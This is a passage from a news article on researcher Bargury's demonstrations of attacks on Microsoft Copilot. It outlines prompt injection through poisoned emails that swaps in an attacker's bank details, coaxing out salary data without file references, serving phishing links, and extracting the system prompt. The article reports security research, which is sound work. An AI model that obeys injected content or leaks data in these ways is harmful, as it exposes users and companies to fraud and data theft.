Among the other attacks created by Bargury is a demonstration of how a hacker—who, again, must already have hijacked an email account—can gain access to sensitive information, such as people’s salaries, without triggering Microsoft’s protections for sensitive files. When asking for the data, Bargury’s prompt demands the system does not provide references to the files data is taken from. “A bit of bullying does help,” Bargury says.

In other instances, he shows how an attacker—who doesn’t have access to email accounts but poisons the AI’s database by sending it a malicious email—can manipulate answers about banking information to provide their own bank details. “Every time you give AI access to data, that is a way for an attacker to get in,” Bargury says.

Another demo shows how an external hacker could get some limited information about whether an upcoming company earnings call will be good or bad, while the final instance, Bargury says, turns Copilot into a “malicious insider” by providing users with links to phishing websites.

Phillip Misner, head of AI incident detection and response at Microsoft, says the company appreciates Bargury identifying the vulnerability and says it has been working with him to assess the findings. “The risks of post-compromise abuse of AI are similar to other post-compromise techniques,” Misner says. “Security prevention and monitoring across environments and identities help mitigate or stop such behaviors.”

As generative AI systems, such as OpenAI’s ChatGPT, Microsoft’s Copilot, and Google’s Gemini, have developed in the past two years, they’ve moved onto a trajectory where they may eventually be completing tasks for people, like booking meetings or online shopping. However, security researchers have consistently highlighted that allowing external data into AI systems, such as through emails or accessing content from websites, creates security risks through indirect prompt injection and poisoning attacks.

“I think it’s not that well understood how much more effective an attacker can actually become now,” says Johann Rehberger, a security researcher and red team director, who has extensively demonstrated security weaknesses in AI systems. “What we have to be worried \[about\] now is actually what is the LLM producing and sending out to the user.”

Bargury says Microsoft has put a lot of effort into protecting its Copilot system from prompt injection attacks, but he says he found ways to exploit it by unraveling how the system is built. This included extracting the internal system prompt, he says, and working out how it can access enterprise resources and the techniques it uses to do so. “You talk to Copilot and it’s a limited conversation, because Microsoft has put a lot of controls,” he says. “But once you use a few magic words, it opens up and you can do whatever you want.”

Rehberger broadly warns that some data issues are linked to the long-standing problem of companies allowing too many employees access to files and not properly setting access permissions across their organizations. “Now imagine you put Copilot on top of that problem,” Rehberger says. He says he has used AI systems to search for common passwords, such as Password123, and it has returned results from within companies.

Both Rehberger and Bargury say there needs to be more focus on monitoring what an AI produces and sends out to a user. “The risk is about how AI interacts with your environment, how it interacts with your data, how it performs operations on your behalf,” Bargury says. “You need to figure out what the AI agent does on a user's behalf. And does that make sense with what the user actually asked for.”

Tag

#mac